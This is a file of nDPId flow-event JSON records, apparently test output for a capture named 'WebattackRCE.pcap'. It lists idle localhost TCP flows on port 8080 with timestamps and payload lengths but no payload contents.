-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 